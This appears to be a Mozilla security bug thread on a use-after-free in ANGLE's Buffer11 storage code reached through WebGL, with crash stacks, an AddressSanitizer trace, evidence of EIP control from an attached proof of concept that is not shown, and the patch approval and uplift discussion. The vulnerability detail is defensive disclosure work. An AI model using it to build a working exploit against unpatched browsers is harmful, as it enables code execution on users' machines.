00000082`717feff0 00007ffe`2878d701 : 0000020c`4cb63f80 00000082`717ff0b8 00000000`00000001 00000000`00000000 : xul!XRE_AddStaticComponent+0x1d07a
00000082`717ff060 00007ffe`2879776d : 00000082`717ff101 0000020c`4d4f3078 00000082`717ff1a0 0000020c`3f240800 : xul!XRE_AddStaticComponent+0x11715
00000082`717ff0f0 00007ffe`28793dab : 0000020c`3f293040 00000082`717ff1b9 00000000`00000000 00000000`00000000 : xul!XRE_AddStaticComponent+0x1b781
00000082`717ff120 00007ffe`287d25ff : 0000020c`3f293040 00007ffe`28cc095e 0000020c`456e11f0 0000020c`3f214a01 : xul!XRE_AddStaticComponent+0x17dbf
00000082`717ff220 00007ffe`28cfacab : 0000020c`45d64e01 0000020c`3f214a10 00000082`717ff600 00007ffe`3b273252 : xul!NS_StringSetIsVoid+0x5edb
00000082`717ff260 00007ffe`28cfaee4 : 00000082`717ff620 00000082`717ff301 00000082`717ff620 00007ffe`2871bac9 : xul!soundtouch::SoundTouch::operator=+0x28513
00000082`717ff2c0 00007ffe`28cc70da : 00000082`717ff620 00000082`717ff3f0 00000000`00000034 00007ffe`3b283e35 : xul!soundtouch::SoundTouch::operator=+0x2874c
00000082`717ff300 00007ffe`28cc6e02 : 0000020c`45138a58 0000020c`4513ec00 00007ffe`2e72fd90 00007ffe`28ccb9dd : xul!mozilla::net::LoadInfo::TriggeringPrincipal+0x491e8e
00000082`717ff330 00007ffe`2af35a0b : 0000020c`4513ec40 00007ffe`2a9c9c16 00000000`00000002 00000082`717ff3f0 : xul!mozilla::net::LoadInfo::TriggeringPrincipal+0x491bb6
00000082`717ff380 00007ffe`2afa9b8d : 0000020c`4513ec40 0000020c`4513ec40 00000082`717ff620 00000000`00000034 : xul!mozilla_dump_image+0x1918beb
00000082`717ff3c0 00007ffe`2bb856d9 : 00000082`717ff620 00007ffe`2dd553c8 0000020c`4513ebe0 0000020c`3f214a10 : xul!mozilla_dump_image+0x198cd6d
00000082`717ff400 00007ffe`28cfadb7 : 0000020c`457fced0 00007ffe`2d1c99b0 0000020c`3f289000 00000000`00010011 : xul!XRE_RunAppShell+0x59
00000082`717ff440 00007ffe`28cc70da : 00000082`717ff620 00000082`717ff600 00000000`00000034 00000082`717ff4a0 : xul!soundtouch::SoundTouch::operator=+0x2861f
00000082`717ff480 00007ffe`28cc6e02 : 00007ffe`2d3c1ab8 00007ffe`287d9684 00007ff7`22dd4974 00007ffe`2bb7a4aa : xul!mozilla::net::LoadInfo::TriggeringPrincipal+0x491e8e
00000082`717ff4b0 00007ffe`2bb8503c : 0000020c`3f289000 00000082`717ff600 00000000`00000034 0000020c`3f207580 : xul!mozilla::net::LoadInfo::TriggeringPrincipal+0x491bb6
00000082`717ff500 00007ff7`22dd1d45 : 00000000`0000000b 00000000`0000000c 0000020c`3f202080 00000000`0000000b : xul!XRE_InitChildProcess+0x888
00000082`717ff7c0 00007ff7`22dd18f9 : 0000020c`3f202080 0000020c`3f202080 00000000`0000000c 0000020c`3f202080 : firefox+0x1d45
00000082`717ff820 00007ff7`22dd266f : 00000000`0000000c 0000020c`3f2020f0 00000000`00000000 00007ffe`87fa2540 : firefox+0x18f9
00000082`717ff8a0 00007ff7`22e112e9 : 00007ffe`837b59f4 00000000`00000000 00000000`0000000d 00000082`7159c000 : firefox+0x266f
00000082`717ff900 00007ffe`86dc8102 : 00007ff7`22e113a0 00000082`7159c000 00000000`00000000 00000000`00000000 : firefox!TargetNtUnmapViewOfSection+0x6a9d
00000082`717ff940 00007ffe`87f8c5b4 : 00007ffe`86dc80e0 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x22
00000082`717ff970 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x34


FOLLOWUP_IP: 
ucrtbase!abort+4e
00007ffe`837398fe cd29            int     29h

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  ucrtbase!abort+4e

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: ucrtbase

IMAGE_NAME:  ucrtbase.dll

DEBUG_FLR_IMAGE_TIMESTAMP:  5632d193

STACK_COMMAND:  ~61s ; kb

BUCKET_ID:  FATAL_APP_EXIT_ucrtbase!abort+4e

PRIMARY_PROBLEM_CLASS:  FATAL_APP_EXIT_ucrtbase!abort+4e

FAILURE_PROBLEM_CLASS:  FATAL_APP_EXIT

FAILURE_EXCEPTION_CODE:  c0000409

FAILURE_IMAGE_NAME:  ucrtbase.dll

FAILURE_FUNCTION_NAME:  abort

FAILURE_SYMBOL_NAME:  ucrtbase.dll!abort

FAILURE_BUCKET_ID:  FATAL_APP_EXIT_c0000409_ucrtbase.dll!abort

ANALYSIS_SOURCE:  UM

FAILURE_ID_HASH_STRING:  um:fatal_app_exit_c0000409_ucrtbase.dll!abort

FAILURE_ID_HASH:  {f324e349-b0b7-1f0f-a2b4-a992c83e193a}

Followup:     MachineOwner
(In reply to Milan Sreckovic [:milan] from comment #15)
> Daniel, this is a bug in ANGLE, so possibly reproducible in Chrome as well. 
> Either way, can you help opening a Chrome security bug and maybe CC one of
> their security people on this bug, or we can copy the details?

I can reproduce it with the exact same test case in Google Chrome. Shall I report it to Google?


=================================================================
==16136==ERROR: AddressSanitizer: heap-use-after-free on address 0x21013e40 at pc 0x0892d9dc bp 0x00cfcb5c sp 0x00cfcb50
READ of size 4 at 0x21013e40 thread T0
==16136==WARNING: Failed to use and restart external symbolizer!
==16136==*** WARNING: Failed to initialize DbgHelp!              ***
==16136==*** Most likely this means that the app is already      ***
==16136==*** using DbgHelp, possibly with incompatible flags.    ***
==16136==*** Due to technical reasons, symbolization might crash ***
==16136==*** or produce wrong results.                           ***
    #0 0x892d9db in rx::Buffer11::updateBufferStorage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:807
    #1 0x8921254 in rx::Buffer11::getBufferStorage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:695
    #2 0x8920bf8 in rx::Buffer11::getSystemMemoryStorage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:323
    #3 0x8921c98 in rx::Buffer11::setSubData C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:360
    #4 0x89205fa in rx::Buffer11::setData C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:305
    #5 0x8716ffa in gl::Buffer::bufferData C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\Buffer.cpp:57
    #6 0x85e17de in gl::Context::bufferData C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\Context.cpp:3568
    #7 0x1a947c33 in gpu::gles2::BufferManager::DoBufferData C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\buffer_manager.cc:463
    #8 0x1a9476a7 in gpu::gles2::BufferManager::ValidateAndDoBufferData C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\buffer_manager.cc:431
    #9 0x1c4bb499 in gpu::gles2::GLES2DecoderImpl::HandleBufferData C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\gles2_cmd_decoder.cc:12316
    #10 0x1c52e219 in gpu::gles2::GLES2DecoderImpl::DoCommandsImpl<0> C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\gles2_cmd_decoder.cc:5204
    #11 0x1a966da7 in gpu::CommandParser::ProcessCommands C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\cmd_parser.cc:53
    #12 0x1c5918f5 in gpu::CommandExecutor::PutChanged C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\command_executor.cc:61
    #13 0x1c4b73de in gpu::CommandBufferService::Flush C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\command_buffer_service.cc:98
    #14 0x1acfb725 in gpu::GpuCommandBufferStub::OnAsyncFlush C:\b\c\b\win_asan_release\src\gpu\ipc\service\gpu_command_buffer_stub.cc:829
    #15 0x1acfb160 in IPC::MessageT<GpuCommandBufferMsg_AsyncFlush_Meta,std::tuple<int,unsigned int,std::vector<ui::LatencyInfo,std::allocator<ui::LatencyInfo> > >,void>::Dispatch<gpu::GpuCommandBufferStub,gpu::GpuCommandBufferStub,void,void (gpu::GpuCommandBufferStub::*)(int, unsigned int, const std::vector<ui::LatencyInfo,std::allocator<ui::LatencyInfo> > &) __attribute__((thiscall))> C:\b\c\b\win_asan_release\src\ipc\ipc_message_templates.h:120
    #16 0x1acf696f in gpu::GpuCommandBufferStub::OnMessageReceived C:\b\c\b\win_asan_release\src\gpu\ipc\service\gpu_command_buffer_stub.cc:244
    #17 0x1ace55c0 in gpu::GpuChannel::HandleMessageHelper C:\b\c\b\win_asan_release\src\gpu\ipc\service\gpu_channel.cc:802
    #18 0x1ace5379 in gpu::GpuChannel::HandleMessage C:\b\c\b\win_asan_release\src\gpu\ipc\service\gpu_channel.cc:782
    #19 0x1acec3ca in base::internal::Invoker<base::internal::BindState<void (gpu::GpuChannel::*)(const scoped_refptr<gpu::GpuChannelMessageQueue> &) __attribute__((thiscall)),base::WeakPtr<gpu::GpuChannel>,scoped_refptr<gpu::GpuChannelMessageQueue> >,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:340
    #20 0x1355a645 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:50
    #21 0x134082df in base::MessageLoop::RunTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:413
    #22 0x13409126 in base::MessageLoop::DeferOrRunPendingTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:422
    #23 0x1340a436 in base::MessageLoop::DoWork C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:515
    #24 0x13560c3a in base::MessagePumpDefault::Run C:\b\c\b\win_asan_release\src\base\message_loop\message_pump_default.cc:33
    #25 0x13407349 in base::MessageLoop::RunHandler C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:378
    #26 0x134863cd in base::RunLoop::Run C:\b\c\b\win_asan_release\src\base\run_loop.cc:37
    #27 0x15a59482 in content::GpuMain C:\b\c\b\win_asan_release\src\content\gpu\gpu_main.cc:303
    #28 0x1329a477 in content::RunNamedProcessTypeMain C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:416
    #29 0x1329bb14 in content::ContentMainRunnerImpl::Run C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:793
    #30 0x1329a050 in content::ContentMain C:\b\c\b\win_asan_release\src\content\app\content_main.cc:20
    #31 0xfeb11fe in ChromeMain C:\b\c\b\win_asan_release\src\chrome\app\chrome_main.cc:112
    #32 0xb7b77 in MainDllLoader::Launch C:\b\c\b\win_asan_release\src\chrome\app\main_dll_loader_win.cc:173
    #33 0xb1943 in main C:\b\c\b\win_asan_release\src\chrome\app\chrome_exe_main_win.cc:248
    #34 0x2c609d in __scrt_common_main_seh f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl:253
    #35 0x76d638f3 in BaseThreadInitThunk+0x23 (C:\WINDOWS\SYSTEM32\KERNEL32.DLL+0x6b8138f3)
    #36 0x77cc5de2 in RtlUnicodeStringToInteger+0x252 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x4b2e5de2)
    #37 0x77cc5dad in RtlUnicodeStringToInteger+0x21d (C:\WINDOWS\SYSTEM32\ntdll.dll+0x4b2e5dad)

0x21013e40 is located 0 bytes inside of 28-byte region [0x21013e40,0x21013e5c)
freed by thread T0 here:
    #0 0x2acc58 in free e:\b\build\slave\win_upload_clang\build\src\third_party\llvm\projects\compiler-rt\lib\asan\asan_malloc_win.cc:44
    #1 0x89315a0 in rx::Buffer11::SystemMemoryStorage::~SystemMemoryStorage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:253
    #2 0x8926261 in rx::Buffer11::checkForDeallocation C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:552
    #3 0x89266ce in rx::Buffer11::markBufferUsage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:580
    #4 0x892139c in rx::Buffer11::getBufferStorage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:696
    #5 0x892299e in rx::Buffer11::getStagingStorage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:847
    #6 0x892d34f in rx::Buffer11::updateBufferStorage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:795
    #7 0x8921254 in rx::Buffer11::getBufferStorage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:695
    #8 0x8920bf8 in rx::Buffer11::getSystemMemoryStorage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:323
    #9 0x8921c98 in rx::Buffer11::setSubData C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:360
    #10 0x89205fa in rx::Buffer11::setData C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:305
    #11 0x8716ffa in gl::Buffer::bufferData C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\Buffer.cpp:57
    #12 0x85e17de in gl::Context::bufferData C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\Context.cpp:3568
    #13 0x1a947c33 in gpu::gles2::BufferManager::DoBufferData C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\buffer_manager.cc:463
    #14 0x1a9476a7 in gpu::gles2::BufferManager::ValidateAndDoBufferData C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\buffer_manager.cc:431
    #15 0x1c4bb499 in gpu::gles2::GLES2DecoderImpl::HandleBufferData C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\gles2_cmd_decoder.cc:12316
    #16 0x1c52e219 in gpu::gles2::GLES2DecoderImpl::DoCommandsImpl<0> C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\gles2_cmd_decoder.cc:5204
    #17 0x1a966da7 in gpu::CommandParser::ProcessCommands C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\cmd_parser.cc:53
    #18 0x1c5918f5 in gpu::CommandExecutor::PutChanged C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\command_executor.cc:61
    #19 0x1c4b73de in gpu::CommandBufferService::Flush C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\command_buffer_service.cc:98
    #20 0x1acfb725 in gpu::GpuCommandBufferStub::OnAsyncFlush C:\b\c\b\win_asan_release\src\gpu\ipc\service\gpu_command_buffer_stub.cc:829
    #21 0x1acfb160 in IPC::MessageT<GpuCommandBufferMsg_AsyncFlush_Meta,std::tuple<int,unsigned int,std::vector<ui::LatencyInfo,std::allocator<ui::LatencyInfo> > >,void>::Dispatch<gpu::GpuCommandBufferStub,gpu::GpuCommandBufferStub,void,void (gpu::GpuCommandBufferStub::*)(int, unsigned int, const std::vector<ui::LatencyInfo,std::allocator<ui::LatencyInfo> > &) __attribute__((thiscall))> C:\b\c\b\win_asan_release\src\ipc\ipc_message_templates.h:120
    #22 0x1acf696f in gpu::GpuCommandBufferStub::OnMessageReceived C:\b\c\b\win_asan_release\src\gpu\ipc\service\gpu_command_buffer_stub.cc:244
    #23 0x1ace55c0 in gpu::GpuChannel::HandleMessageHelper C:\b\c\b\win_asan_release\src\gpu\ipc\service\gpu_channel.cc:802
    #24 0x1ace5379 in gpu::GpuChannel::HandleMessage C:\b\c\b\win_asan_release\src\gpu\ipc\service\gpu_channel.cc:782
    #25 0x1acec3ca in base::internal::Invoker<base::internal::BindState<void (gpu::GpuChannel::*)(const scoped_refptr<gpu::GpuChannelMessageQueue> &) __attribute__((thiscall)),base::WeakPtr<gpu::GpuChannel>,scoped_refptr<gpu::GpuChannelMessageQueue> >,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:340
    #26 0x1355a645 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:50
    #27 0x134082df in base::MessageLoop::RunTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:413
    #28 0x13409126 in base::MessageLoop::DeferOrRunPendingTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:422

previously allocated by thread T0 here:
    #0 0x2acd3c in malloc e:\b\build\slave\win_upload_clang\build\src\third_party\llvm\projects\compiler-rt\lib\asan\asan_malloc_win.cc:65
    #1 0x8c829d8 in operator new f:\dd\vctools\crt\vcstartup\src\heap\new_scalar.cpp:19
    #2 0x892c5f0 in rx::Buffer11::allocateStorage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:709
    #3 0x8921062 in rx::Buffer11::getBufferStorage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:686
    #4 0x8920bf8 in rx::Buffer11::getSystemMemoryStorage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:323
    #5 0x8921c98 in rx::Buffer11::setSubData C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:360
    #6 0x89205fa in rx::Buffer11::setData C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:305
    #7 0x8716ffa in gl::Buffer::bufferData C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\Buffer.cpp:57
    #8 0x85e17de in gl::Context::bufferData C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\Context.cpp:3568
    #9 0x1a947c33 in gpu::gles2::BufferManager::DoBufferData C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\buffer_manager.cc:463
    #10 0x1a9476a7 in gpu::gles2::BufferManager::ValidateAndDoBufferData C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\buffer_manager.cc:431
    #11 0x1c4bb499 in gpu::gles2::GLES2DecoderImpl::HandleBufferData C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\gles2_cmd_decoder.cc:12316
    #12 0x1c52e219 in gpu::gles2::GLES2DecoderImpl::DoCommandsImpl<0> C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\gles2_cmd_decoder.cc:5204
    #13 0x1a966da7 in gpu::CommandParser::ProcessCommands C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\cmd_parser.cc:53
    #14 0x1c5918f5 in gpu::CommandExecutor::PutChanged C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\command_executor.cc:61
    #15 0x1c4b73de in gpu::CommandBufferService::Flush C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\command_buffer_service.cc:98
    #16 0x1acfb725 in gpu::GpuCommandBufferStub::OnAsyncFlush C:\b\c\b\win_asan_release\src\gpu\ipc\service\gpu_command_buffer_stub.cc:829
    #17 0x1acfb160 in IPC::MessageT<GpuCommandBufferMsg_AsyncFlush_Meta,std::tuple<int,unsigned int,std::vector<ui::LatencyInfo,std::allocator<ui::LatencyInfo> > >,void>::Dispatch<gpu::GpuCommandBufferStub,gpu::GpuCommandBufferStub,void,void (gpu::GpuCommandBufferStub::*)(int, unsigned int, const std::vector<ui::LatencyInfo,std::allocator<ui::LatencyInfo> > &) __attribute__((thiscall))> C:\b\c\b\win_asan_release\src\ipc\ipc_message_templates.h:120
    #18 0x1acf696f in gpu::GpuCommandBufferStub::OnMessageReceived C:\b\c\b\win_asan_release\src\gpu\ipc\service\gpu_command_buffer_stub.cc:244
    #19 0x1ace55c0 in gpu::GpuChannel::HandleMessageHelper C:\b\c\b\win_asan_release\src\gpu\ipc\service\gpu_channel.cc:802
    #20 0x1ace5379 in gpu::GpuChannel::HandleMessage C:\b\c\b\win_asan_release\src\gpu\ipc\service\gpu_channel.cc:782
    #21 0x1acec3ca in base::internal::Invoker<base::internal::BindState<void (gpu::GpuChannel::*)(const scoped_refptr<gpu::GpuChannelMessageQueue> &) __attribute__((thiscall)),base::WeakPtr<gpu::GpuChannel>,scoped_refptr<gpu::GpuChannelMessageQueue> >,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:340
    #22 0x1355a645 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:50
    #23 0x134082df in base::MessageLoop::RunTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:413
    #24 0x13409126 in base::MessageLoop::DeferOrRunPendingTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:422
    #25 0x1340a436 in base::MessageLoop::DoWork C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:515
    #26 0x13560c3a in base::MessagePumpDefault::Run C:\b\c\b\win_asan_release\src\base\message_loop\message_pump_default.cc:33
    #27 0x13407349 in base::MessageLoop::RunHandler C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:378
    #28 0x134863cd in base::RunLoop::Run C:\b\c\b\win_asan_release\src\base\run_loop.cc:37

SUMMARY: AddressSanitizer: heap-use-after-free C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:807 in rx::Buffer11::updateBufferStorage
Shadow bytes around the buggy address:
  0x34202770: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x34202780: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x34202790: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x342027a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x342027b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x342027c0: fa fa fa fa fa fa fa fa[fd]fd fd fd fa fa fd fd
  0x342027d0: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa
  0x342027e0: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
  0x342027f0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
  0x34202800: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa
  0x34202810: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==16136==ABORTING
Flags: needinfo?(loobenyang)
Reported to google: https://bugs.chromium.org/p/chromium/issues/detail?id=682020

Thanks for the quick fix Milan, please let me know if there is anything else I can help.
(In reply to Looben Yang from comment #19)
> Reported to google:
> https://bugs.chromium.org/p/chromium/issues/detail?id=682020
> 
> Thanks for the quick fix Milan, please let me know if there is anything else
> I can help.

Thanks.  You can put a note in the chromium bug with my e-mail in that bug if they want to know the results of our investigation and our current fix/workaround?
Something similar was originally tracked as bug 1248276, but it was never identified as security and we didn't get far with it, other than "ANGLE update solves it".  Which it clearly didn't :)
Comment on attachment 8827288 [details] [diff] [review]
Speculative, mark as used earlier.

While we're waiting for ANGLE team to respond, let's see if it makes sense to land this.  Morris, you've looked at bug 1248276, can you take a look at this bug and this patch?
Attachment #8827288 - Flags: review?(mtseng)
Attachment #8827288 - Flags: review?(mtseng) → review+
(In reply to Milan Sreckovic [:milan] from comment #20)
> (In reply to Looben Yang from comment #19)
> > Reported to google:
> > https://bugs.chromium.org/p/chromium/issues/detail?id=682020
> > 
> > Thanks for the quick fix Milan, please let me know if there is anything else
> > I can help.
> 
> Thanks.  You can put a note in the chromium bug with my e-mail in that bug
> if they want to know the results of our investigation and our current
> fix/workaround?
Done.
Comment on attachment 8827288 [details] [diff] [review]
Speculative, mark as used earlier.

[Security approval request comment]
How easily could an exploit be constructed based on the patch? Not easily, just based on the patch.

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?  Not really.

Which older supported branches are affected by this flaw?  Likely.  This is a problem in ANGLE, but it isn't clear that a particular version introduced it.

If not all supported branches, which bug introduced the flaw?

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?
The ports are trivial.

How likely is this patch to cause regressions; how much testing does it need?  There would be a temporary increase in memory usage, but, I believe, only in the cases where deleting that memory would lead to UAF, so that's OK.
Attachment #8827288 - Flags: sec-approval?
This appears to be a ~50 crashes per day case (see bug 1248276.)
Assignee: nobody → milan
sec-approval for checkin on February 7, two weeks into the new cycle. 

I'm going to assume this affects 52 and higher. I would like to know if this affects ESR45.
Whiteboard: [checkin on 2/7]
Attachment #8827288 - Flags: sec-approval? → sec-approval+
A new POC UAF_updateBufferStorage_POC_EIP_41414141.html is attached to illustrate the clear exploitability of this bug by controlling the EIP register.

Firefox version: 53.0a1 (2017-01-21) (32-bit)
OS: Windows 10 64 bit


(114fc.1b754): Access violation - code c0000005 (!!! second chance !!!)
eax=e5e5e5e5 ebx=244312e0 ecx=244312e0 edx=00000000 esi=227f03d0 edi=227f03d0
eip=41414141 esp=00ffdd28 ebp=00ffdd60 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
41414141 ??              ???



00ffdd4c 227f03d0 00000000 0x41414141
00ffdd84 244312e0 00000000 libGLESv2!rx::Buffer11::updateBufferStorage+0xde
00ffdda8 00000000 17264c80 libGLESv2!rx::Buffer11::getBufferStorage+0x85
00ffddd8 00000000 17264c80 libGLESv2!rx::Buffer11::getSystemMemoryStorage+0x13
00ffde10 00008892 18258000 libGLESv2!rx::Buffer11::setSubData+0x94
00ffde44 00008892 18258000 libGLESv2!rx::Buffer11::setData+0x29
-------- -------- -------- libGLESv2!gl::Buffer::bufferData+0x1b
00008892 00000877 18258000 libGLESv2!gl::Context::bufferData+0x34
00008892 00000877 18258000 libGLESv2!gl::BufferData+0x40
-------- -------- -------- xul!mozilla::gl::GLContext::raw_fBufferData+0x16
00008892 00000877 18258000 xul!mozilla::gl::GLContext::fBufferData+0x1a
00008892 00000877 18258000 xul!mozilla::WebGLBuffer::BufferData+0xc3
00008892 00000877 18258000 xul!mozilla::WebGLContext::BufferDataImpl+0x48
00008892 00000877 00000000 xul!mozilla::WebGLContext::BufferData+0x82
1373d000 00ffe024 15fe9c00 xul!mozilla::dom::WebGL2RenderingContextBinding::bufferData+0x29c
1373d000 00000003 15fe9c00 xul!mozilla::dom::GenericBindingMethod+0xc2
-------- -------- -------- xul!js::CallJSNative+0xe9
00000000 1373d000 00000000 xul!js::InternalCallOrConstruct+0x4b4
1373d000 00006000 23d44038 xul!InternalCall+0xa8
00ffead8 00ffead8 00ffead8 xul!Interpret+0x5f7e
https://hg.mozilla.org/mozilla-central/rev/9a103b890855
Status: NEW → RESOLVED
Closed: 3 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla54
Jeff, can you track this and make sure it survives our next ANGLE update, or that it shows up in the upstream build. Whether it's this particular change or the equivalent.
Flags: needinfo?(jgilbert)
Milan, can you request uplift for this? Thanks!
Flags: needinfo?(milan)
Flags: needinfo?(milan)
See Also: → 1248276
Comment on attachment 8827288 [details] [diff] [review]
Speculative, mark as used earlier.

Approval Request Comment
[Feature/Bug causing the regression]:
[User impact if declined]: UAF, sec-high
[Is this code covered by automated tests?]: No
[Has the fix been verified in Nightly?]: Yes
[Needs manual test from QE? If yes, steps to reproduce]: 
[List of other uplifts needed for the feature/fix]:
[Is the change risky?]: Not risky as a change, but until we get a confirmation from Chrome, it may not be the fix they would have chosen.  This is the simplest one.
[Why is the change risky/not risky?]:
[String changes made/needed]:
Attachment #8827288 - Flags: approval-mozilla-beta?
Attachment #8827288 - Flags: approval-mozilla-aurora?
Group: gfx-core-security → core-security-release
Comment on attachment 8827288 [details] [diff] [review]
Speculative, mark as used earlier.

avoid uaf in angle, aurora53+, beta52+
Attachment #8827288 - Flags: approval-mozilla-beta?
Attachment #8827288 - Flags: approval-mozilla-beta+
Attachment #8827288 - Flags: approval-mozilla-aurora?
Attachment #8827288 - Flags: approval-mozilla-aurora+
Comment on attachment 8827288 [details] [diff] [review]
Speculative, mark as used earlier.

See comment 32.
Attachment #8827288 - Flags: approval-mozilla-esr45?
Comment on attachment 8827288 [details] [diff] [review]
Speculative, mark as used earlier.

Fix a sec-high. ESR45+.
Attachment #8827288 - Flags: approval-mozilla-esr45? → approval-mozilla-esr45+
Flagging this for verification, instructions in Comment 0.
Flags: qe-verify+
This needs a rebased patch for ESR45.
Flags: needinfo?(milan)
I don't know that this applies to ESR45; it may have been a more recent change in ANGLE that broke this.
Flags: needinfo?(milan)
Attachment #8831423 - Attachment mime type: text/plain → text/html
I can reproduce the crashes on a Win10 machine with a GeForce GTX 1060 graphics card.
Original testcase crash report UAF: bp-901cff05-ce78-4c6c-a092-748c12170214
The EIP control crash: bp-0324a1dd-0922-42e3-8ae2-823f42170214
Sorry if that alarmed anyone: I reproduced using the same 53.0a1 2016-12-22 nightly the reporter originally used. Using yesterday's 53 Aurora or the current 52 Beta 5 I could no longer reproduce. Appears to be fixed.
